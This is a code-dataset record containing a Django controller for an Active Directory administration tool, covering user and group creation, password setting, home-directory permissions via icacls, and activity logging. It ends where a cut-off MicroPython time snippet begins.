{"api_name": "PIL.Image", "line_number": 160, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 188, "usage_type": "call"}]} +{"seq_id": "75009522", "text": "import shlex\nimport time\nfrom api.controller import Controller\nfrom api.exceptions import HttpBadRequest\nfrom arma.core import Core\nfrom arma import models as arma_models, exceptions\nfrom arma.decorators import requires_permission\nfrom adum import models as adum_models\nfrom pwgen import pwgen\nfrom auth.backends import create_user\nfrom django.conf import settings\nimport ldap3\nimport os\nimport subprocess\n\n\nclass User(Controller):\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def _get_root(self):\n list = adum_models.MenuItem.objects.get(pk=self.args['list'])\n users = arma_models.User.search(None, list.query)\n out = []\n for user in users:\n out.append(self.serialize(user))\n return {'users': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def create(self):\n username = None\n for attr in self.args['public_attributes']:\n if attr['attribute'] == 'sAMAccountName':\n username = attr['set_value'].upper()\n break\n dn = \"cn=%s,%s\" % (username, self.args['dn'])\n attrs = {}\n for attr in self.args['attributes']:\n if attr['attribute'] == 'sAMAccountName':\n attrs[attr['attribute']] = attr['set_value'].upper()\n else:\n attrs[attr['attribute']] = attr['set_value'].encode(\"utf-8\")\n raw_password = pwgen(12, no_symbols=True)\n password = '\"%s\"' % raw_password\n password = password.encode('utf-16-le')\n attrs['unicodePwd'] = password\n user = arma_models.User.create(attrs=attrs, dn=dn)\n user.attr_replace('userAccountControl', '512')\n
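The create() method above leans on an Active Directory convention that is easy to get wrong: the initial password must be wrapped in literal double quotes and encoded as UTF-16-LE before it is written to the unicodePwd attribute. A standalone sketch of just that step (the helper name is illustrative, not from the source):

```python
def encode_ad_password(raw_password):
    # Active Directory expects the quoted password, e.g. '"hunter2"', in UTF-16-LE.
    return ('"%s"' % raw_password).encode('utf-16-le')

# Every character becomes two bytes; the first pair is the opening quote.
assert encode_ad_password('x') == b'"\x00x\x00"\x00'
```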
user.attr_replace('pwdLastSet', '0')\n for grp in self.args['groups']:\n group = arma_models.Group.open(grp['group_name'])\n user.add_to_group(group)\n au, u = create_user(username=username)\n template = adum_models.Template.objects.get(pk=self.args['id'])\n uc = adum_models.UserCreation(user=au, password=raw_password, template=template)\n uc.save()\n self.create_home_directory(user)\n return {'user': self.serialize(user)}\n\n def open(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n return {'user': self.serialize(user)}\n\n def search(self):\n if len(self.args['query']) == 0:\n return {'groups': []}\n users = arma_models.User.search(self.args['query'])\n out = []\n for user in users:\n out.append(self.serialize(user))\n return {'users': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN,\n adum_models.Permission.TYPE_KLA,\n )\n def update(self):\n user = arma_models.User.open(self.args['sAMAccountName'])\n for key, value in self.args.items():\n if key == 'username':\n continue\n if value != user.get_first_attr(key):\n user.attr_replace(key, value)\n self.create_activity_item(key, value, user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def add_to_group(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n group = arma_models.Group.open(self.args['group'])\n user.add_to_group(group)\n user.reload()\n self.create_activity_item('memberOf+', group.get_first_attr('sAMAccountName'), user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def remove_from_group(self):\n user = arma_models.User.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n group = arma_models.Group.open(self.args['group'])\n user.remove_from_group(group)\n user.reload()\n self.create_activity_item('memberOf-', group.get_first_attr('sAMAccountName'), user, self.request.user)\n return {'user': self.serialize(user)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def set_password(self):\n user = arma_models.User.open(self.args['sAMAccountName'])\n password_val = '\"%s\"' % self.args['password']\n password = password_val.encode('utf-16-le')\n user.attr_replace('unicodePwd', password)\n user.reload()\n self.create_activity_item('userPassword', 'secret', user, self.request.user)\n return {'user': self.serialize(user)}\n\n def create_home_directory(self, user):\n user.reload()\n path = user.get_first_attr('homeDirectory')\n os.mkdir(path)\n self.permission_home_directory(path, user.get_first_attr('sAMAccountName'))\n\n def permission_home_directory(self, path, username):\n cmd = \"icacls '%s' /grant '%s\\\\%s':(OI)(CI)M\" % (path, settings.DOMAIN_NAME, username)\n args = shlex.split(cmd)\n print(cmd)\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE)\n p.wait()\n output1, _ = p.communicate()\n except subprocess.CalledProcessError as e:\n pass\n print(\"Output is \", output1)\n if b\"Failed processing 0 files\" not in output1:\n # time.sleep(2)\n self.permission_home_directory(path, username)\n cmd = \"icacls '%s' /setowner '%s\\\\%s' /T\" % (path, settings.DOMAIN_NAME, username)\n args = shlex.split(cmd)\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE)\n 
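The Popen/wait/communicate sequence that follows can be condensed: since Python 3.5, subprocess.run performs the same spawn-wait-capture steps in one call. A hedged sketch of an equivalent invocation for the icacls command string built above (check=False mirrors the original, which inspects the output rather than raising):

```python
import shlex
import subprocess

def run_and_capture(cmd):
    # shlex.split honors the quoting in the command string, exactly as above.
    result = subprocess.run(shlex.split(cmd), stdout=subprocess.PIPE, check=False)
    return result.stdout
```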
p.wait()\n output1, _ = p.communicate()\n except subprocess.CalledProcessError as e:\n output1 = e.output\n print(\"Output is \", output1)\n if b\"Failed processing 0 files\" not in output1:\n # time.sleep(2)\n self.permission_home_directory(path, username)\n cmd = \"icacls '%s' /setowner '%s\\\\%s' /T\" % (path, settings.DOMAIN_NAME, username)\n args = shlex.split(cmd)\n try:\n p = subprocess.Popen(args, stdout=subprocess.PIPE)\n p.wait()\n output2, _ = p.communicate()\n except subprocess.CalledProcessError as e:\n output2 = e.output\n return output1, output2\n\n def create_activity_item(self, attr, value, arma_affected, adum_creator):\n ai = adum_models.ActivityItem\n mapping = ai.ATTR_MAPPING\n if attr in mapping:\n type = mapping[attr]\n message = ai.MESSAGES[type]\n message_data = {\n 'creating_user': \"%s %s\" % (adum_creator.first_name, adum_creator.last_name),\n 'affected_object': \"%s %s\" % (arma_affected.first_name, arma_affected.last_name),\n 'value': value\n }\n message = message % message_data\n item = ai(\n type=type,\n message=message,\n affected_object_type=ai.T_USER,\n affected_object_name=arma_affected.get_first_attr('sAMAccountName'),\n creating_user=adum_creator\n )\n item.save()\n return item\n\n @classmethod\n def serialize(cls, user):\n out = {\n 'dn': user.dn,\n 'givenName': user.first_name,\n 'sn': user.last_name,\n 'sAMAccountName': user.username,\n 'mail': user.get_first_attr('mail'),\n 'description': user.get_first_attr('description'),\n 'activity': cls.get_activity(user)\n }\n try:\n member_of = user.attrs['memberOf']\n if len(member_of) > 0:\n members = []\n for member in member_of:\n try:\n group = arma_models.Group.open(member, open_attr='distinguishedName')\n members.append(Group.serialize(group))\n except exceptions.ObjectNotFound:\n pass\n out['member_of'] = members\n except KeyError:\n pass\n try:\n uc = adum_models.UserCreation.objects.get(user__username=user.username)\n out['letter_id'] = uc.template.letter.id\n except adum_models.UserCreation.DoesNotExist:\n pass\n return out\n\n @classmethod\n def get_activity(cls, user):\n ai = adum_models.ActivityItem.objects.filter(\n affected_object_type=adum_models.ActivityItem.T_USER,\n affected_object_name=user.get_first_attr('sAMAccountName')\n ).order_by('-created_at')[:10]\n out = []\n for item in ai:\n me = {\n 'message': item.message,\n 'created_at': item.created_at.strftime(\"%Y-%m-%d %H:%M:%S\")\n }\n out.append(me)\n return out\n\n\nclass Group(Controller):\n def open(self):\n group = arma_models.Group.open(self.args['sAMAccountName'])\n return {'group': self.serialize(group)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN,\n adum_models.Permission.TYPE_KLA,\n )\n def update(self):\n group = arma_models.Group.open(self.args['sAMAccountName'])\n for key, value in self.args.items():\n if key == 'username':\n continue\n group.attr_replace(key, value)\n self.create_activity_item(key, value, group, self.request.user)\n return {'group': self.serialize(group)}\n\n def search(self):\n if len(self.args['query']) == 0:\n return {'groups': []}\n groups = arma_models.Group.search(self.args['query'])\n out = []\n for group in groups:\n out.append(self.serialize(group))\n return {'groups': out}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def add_user(self):\n group = arma_models.Group.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n user = arma_models.User.open(self.args['user'])\n group.add_user(user)\n group.reload()\n self.create_activity_item('member+', user.get_first_attr('sAMAccountName'), group, self.request.user)\n return {'group': self.serialize(group)}\n\n @requires_permission(\n adum_models.Permission.TYPE_SUPERUSER,\n adum_models.Permission.TYPE_ADMIN\n )\n def remove_user(self):\n group = arma_models.Group.open(self.args['sAMAccountName'], attrs=ldap3.ALL_ATTRIBUTES)\n user = 
arma_models.User.open(self.args['user'])\n group.remove_user(user)\n group.reload()\n self.create_activity_item(\n 'member-',\n user.get_first_attr('sAMAccountName'),\n group,\n self.request.user,\n reverse_object=user\n )\n return {'group': self.serialize(group)}\n\n def create_activity_item(self, attr, value, arma_affected, adum_creator, reverse_object=None):\n ai = adum_models.ActivityItem\n mapping = ai.ATTR_MAPPING\n if attr in mapping:\n type = mapping[attr]\n message = ai.MESSAGES[type]\n message_data = {\n 'creating_user': \"%s %s\" % (adum_creator.first_name, adum_creator.last_name),\n 'affected_object': \"%s\" % arma_affected.get_first_attr('sAMAccountName'),\n 'value': value\n }\n message = message % message_data\n item = ai(\n type=type,\n message=message,\n affected_object_type=ai.T_GROUP,\n affected_object_name=arma_affected.get_first_attr('sAMAccountName'),\n creating_user=adum_creator\n )\n item.save()\n return item\n\n @classmethod\n def get_activity(cls, user):\n ai = adum_models.ActivityItem.objects.filter(\n affected_object_type=adum_models.ActivityItem.T_GROUP,\n affected_object_name=user.get_first_attr('sAMAccountName')\n ).order_by('-created_at')[:10]\n out = []\n for item in ai:\n me = {\n 'message': item.message,\n 'created_at': item.created_at.strftime(\"%Y-%m-%d %H:%M:%S\")\n }\n out.append(me)\n return out\n\n @classmethod\n def serialize(cls, group):\n out = {\n 'dn': group.dn,\n 'sAMAccountName': group.name,\n 'activity': cls.get_activity(group)\n }\n\n try:\n members = group.attrs['member']\n if len(members) > 0:\n members_out = []\n for member in members:\n try:\n user = arma_models.User.open(member, open_attr='distinguishedName')\n members_out.append(User.serialize(user))\n except exceptions.ObjectNotFound:\n pass\n out['members'] = members_out\n except KeyError:\n pass\n\n return out\n\n\nclass Permission(Controller):\n model = adum_models.Permission\n\n def create(self):\n try:\n arma_models.Group.open(self.args['group_name'])\n except exceptions.ObjectNotFound:\n raise HttpBadRequest('Group does not exist')\n permission, created = adum_models.Permission.objects.get_or_create(\n type=self.args['type'],\n group_name=self.args['group_name']\n )\n permission.save()\n return self._format_singular(self._serialize(permission))\n\n def my_permissions(self):\n permissions = adum_models.Permission.objects.all()\n adum_user = adum_models.User.objects.get(user=self.request.user)\n arma_user = arma_models.User.open(adum_user.samaccountname)\n out = []\n for permission in permissions:\n if permission.type not in out:\n arma_group = arma_models.Group.open(permission.group_name)\n if arma_group.has_user(arma_user):\n out.append(permission.type)\n return self._format_plural({'permissions': out})\n\n def _can_delete(self):\n if self.model.type == adum_models.Permission.TYPE_SUPERUSER:\n if adum_models.Permission.objects.filter(type=adum_models.Permission.TYPE_SUPERUSER).count() == 1:\n return False\n return True\n return True\n\n\nclass Menu(Controller):\n model = adum_models.Menu\n\n def _pre_return(self, model, out):\n items = adum_models.MenuItem.objects.filter(menu=model)\n items_out = []\n for item in items:\n items_out.append(self.serializer(item).pack())\n out['items'] = items_out\n\n\nclass MenuItem(Controller):\n model = adum_models.MenuItem\n\n\nclass Search(Controller):\n def _get_root(self):\n results = Core.search(self.args['query'])\n out = []\n for result in results:\n me = {}\n if isinstance(result, arma_models.Group):\n me['type'] = 'group'\n me['dn'] = 
result.dn\n me['name'] = result.name\n me['text'] = \"Group: %s\" % result.name\n me['sAMAccountName'] = result.get_first_attr('sAMAccountName')\n elif isinstance(result, arma_models.User):\n me['type'] = 'user'\n me['dn'] = result.dn\n me['first_name'] = result.first_name\n me['last_name'] = result.last_name\n me['text'] = \"User: %s %s (%s)\" % (\n result.first_name,\n result.last_name,\n result.get_first_attr('sAMAccountName')\n )\n me['sAMAccountName'] = result.get_first_attr('sAMAccountName')\n else:\n continue\n out.append(me)\n return {'results': out}\n\n\nclass Template(Controller):\n model = adum_models.Template\n\n def _pre_return(self, model, out):\n if isinstance(model, adum_models.Template):\n out['attributes'] = self._iterate_and_serialize(adum_models.TemplateAttribute.objects.filter(template=model))\n out['groups'] = self._iterate_and_serialize(adum_models.TemplateGroup.objects.filter(template=model))\n\n\nclass TemplateAttribute(Controller):\n model = adum_models.TemplateAttribute\n\n\nclass TemplateGroup(Controller):\n model = adum_models.TemplateGroup\n\n\nclass Letter(Controller):\n model = adum_models.Letter", "sub_path": "frontend/controllers.py", "file_name": "controllers.py", "file_ext": "py", "file_size_in_byte": 16264, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "api.controller.Controller", "line_number": 17, "usage_type": "name"}, {"api_name": "adum.models.MenuItem.objects.get", "line_number": 23, "usage_type": "call"}, {"api_name": "adum.models.MenuItem", "line_number": 23, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 23, "usage_type": "name"}, {"api_name": "arma.models.User.search", "line_number": 24, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 24, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 24, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 18, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 19, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 19, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 20, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 20, "usage_type": "name"}, {"api_name": "pwgen.pwgen", "line_number": 47, "usage_type": "call"}, {"api_name": "arma.models.User.create", "line_number": 51, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 51, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 51, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 55, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 55, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 55, "usage_type": "name"}, {"api_name": "auth.backends.create_user", "line_number": 57, "usage_type": "call"}, {"api_name": "adum.models.Template.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "adum.models.Template", "line_number": 58, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 58, "usage_type": "name"}, {"api_name": "adum.models.UserCreation", "line_number": 59, "usage_type": "call"}, {"api_name": "adum.models", "line_number": 59, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 30, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 31, "usage_type": "attribute"}, {"api_name": 
"adum.models", "line_number": 31, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 32, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 32, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 65, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 65, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 65, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 65, "usage_type": "attribute"}, {"api_name": "arma.models.User.search", "line_number": 71, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 71, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 71, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 83, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 83, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 83, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 77, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 78, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 78, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 79, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 79, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 80, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 80, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 97, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 97, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 97, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 97, "usage_type": "attribute"}, {"api_name": "arma.models.Group.open", "line_number": 98, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 98, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 98, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 92, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 93, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 93, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 94, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 94, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 109, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 109, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 109, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 109, "usage_type": "attribute"}, {"api_name": "arma.models.Group.open", "line_number": 110, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 110, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 110, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 104, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 105, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 105, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 106, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 106, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 121, "usage_type": "call"}, 
{"api_name": "arma.models.User", "line_number": 121, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 121, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 116, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 117, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 117, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 118, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 118, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 132, "usage_type": "call"}, {"api_name": "django.conf.settings.DOMAIN_NAME", "line_number": 136, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 136, "usage_type": "name"}, {"api_name": "shlex.split", "line_number": 137, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 140, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 140, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 143, "usage_type": "attribute"}, {"api_name": "django.conf.settings.DOMAIN_NAME", "line_number": 149, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 149, "usage_type": "name"}, {"api_name": "shlex.split", "line_number": 150, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 152, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 152, "usage_type": "attribute"}, {"api_name": "subprocess.CalledProcessError", "line_number": 155, "usage_type": "attribute"}, {"api_name": "adum.models.ActivityItem", "line_number": 160, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 160, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 198, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 198, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 198, "usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 200, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 200, "usage_type": "name"}, {"api_name": "adum.models.UserCreation.objects.get", "line_number": 206, "usage_type": "call"}, {"api_name": "adum.models.UserCreation", "line_number": 206, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 206, "usage_type": "name"}, {"api_name": "adum.models.UserCreation", "line_number": 208, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 208, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem.objects.filter", "line_number": 214, "usage_type": "call"}, {"api_name": "adum.models.ActivityItem", "line_number": 214, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 214, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 215, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 215, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 228, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 230, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 230, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 230, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 239, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 239, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 
239, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 233, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 234, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 234, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 235, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 235, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 236, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 236, "usage_type": "name"}, {"api_name": "arma.models.Group.search", "line_number": 250, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 250, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 250, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 261, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 261, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 261, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 261, "usage_type": "attribute"}, {"api_name": "arma.models.User.open", "line_number": 262, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 262, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 262, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 256, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 257, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 257, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 258, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 258, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 273, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 273, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 273, "usage_type": "name"}, {"api_name": "ldap3.ALL_ATTRIBUTES", "line_number": 273, "usage_type": "attribute"}, {"api_name": "arma.models.User.open", "line_number": 274, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 274, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 274, "usage_type": "name"}, {"api_name": "arma.decorators.requires_permission", "line_number": 268, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 269, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 269, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 270, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 270, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 287, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 287, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem.objects.filter", "line_number": 310, "usage_type": "call"}, {"api_name": "adum.models.ActivityItem", "line_number": 310, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 310, "usage_type": "name"}, {"api_name": "adum.models.ActivityItem", "line_number": 311, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 311, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 337, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 337, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 337, 
"usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 339, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 339, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 348, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 349, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 349, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 353, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 353, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 353, "usage_type": "name"}, {"api_name": "arma.exceptions.ObjectNotFound", "line_number": 354, "usage_type": "attribute"}, {"api_name": "arma.exceptions", "line_number": 354, "usage_type": "name"}, {"api_name": "api.exceptions.HttpBadRequest", "line_number": 355, "usage_type": "call"}, {"api_name": "adum.models.Permission.objects.get_or_create", "line_number": 356, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 356, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 356, "usage_type": "name"}, {"api_name": "adum.models.Permission.objects.all", "line_number": 364, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 364, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 364, "usage_type": "name"}, {"api_name": "adum.models.User.objects.get", "line_number": 365, "usage_type": "call"}, {"api_name": "adum.models.User", "line_number": 365, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 365, "usage_type": "name"}, {"api_name": "arma.models.User.open", "line_number": 366, "usage_type": "call"}, {"api_name": "arma.models.User", "line_number": 366, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 366, "usage_type": "name"}, {"api_name": "arma.models.Group.open", "line_number": 370, "usage_type": "call"}, {"api_name": "arma.models.Group", "line_number": 370, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 370, "usage_type": "name"}, {"api_name": "adum.models.Permission", "line_number": 376, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 376, "usage_type": "name"}, {"api_name": "adum.models.Permission.objects.filter", "line_number": 377, "usage_type": "call"}, {"api_name": "adum.models.Permission", "line_number": 377, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 377, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 383, "usage_type": "name"}, {"api_name": "adum.models.Menu", "line_number": 384, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 384, "usage_type": "name"}, {"api_name": "adum.models.MenuItem.objects.filter", "line_number": 387, "usage_type": "call"}, {"api_name": "adum.models.MenuItem", "line_number": 387, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 387, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 394, "usage_type": "name"}, {"api_name": "adum.models.MenuItem", "line_number": 395, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 395, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 398, "usage_type": "name"}, {"api_name": "arma.core.Core.search", "line_number": 400, "usage_type": "call"}, {"api_name": "arma.core.Core", "line_number": 400, "usage_type": "name"}, {"api_name": 
"arma.models.Group", "line_number": 404, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 404, "usage_type": "name"}, {"api_name": "arma.models.User", "line_number": 410, "usage_type": "attribute"}, {"api_name": "arma.models", "line_number": 410, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 427, "usage_type": "name"}, {"api_name": "adum.models.Template", "line_number": 428, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 428, "usage_type": "name"}, {"api_name": "adum.models.Template", "line_number": 431, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 431, "usage_type": "name"}, {"api_name": "adum.models.TemplateAttribute.objects.filter", "line_number": 432, "usage_type": "call"}, {"api_name": "adum.models.TemplateAttribute", "line_number": 432, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 432, "usage_type": "name"}, {"api_name": "adum.models.TemplateGroup.objects.filter", "line_number": 433, "usage_type": "call"}, {"api_name": "adum.models.TemplateGroup", "line_number": 433, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 433, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 436, "usage_type": "name"}, {"api_name": "adum.models.TemplateAttribute", "line_number": 437, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 437, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 440, "usage_type": "name"}, {"api_name": "adum.models.TemplateGroup", "line_number": 441, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 441, "usage_type": "name"}, {"api_name": "api.controller.Controller", "line_number": 444, "usage_type": "name"}, {"api_name": "adum.models.Letter", "line_number": 445, "usage_type": "attribute"}, {"api_name": "adum.models", "line_number": 445, "usage_type": "name"}]} +{"seq_id": "622746602", "text": "def test():\n \"\"\"Return current UTC time as tuple.\n \"\"\"\n from network import WLAN, STA_IF\n import machine\n import ntptime\n import ujson as json\n\n 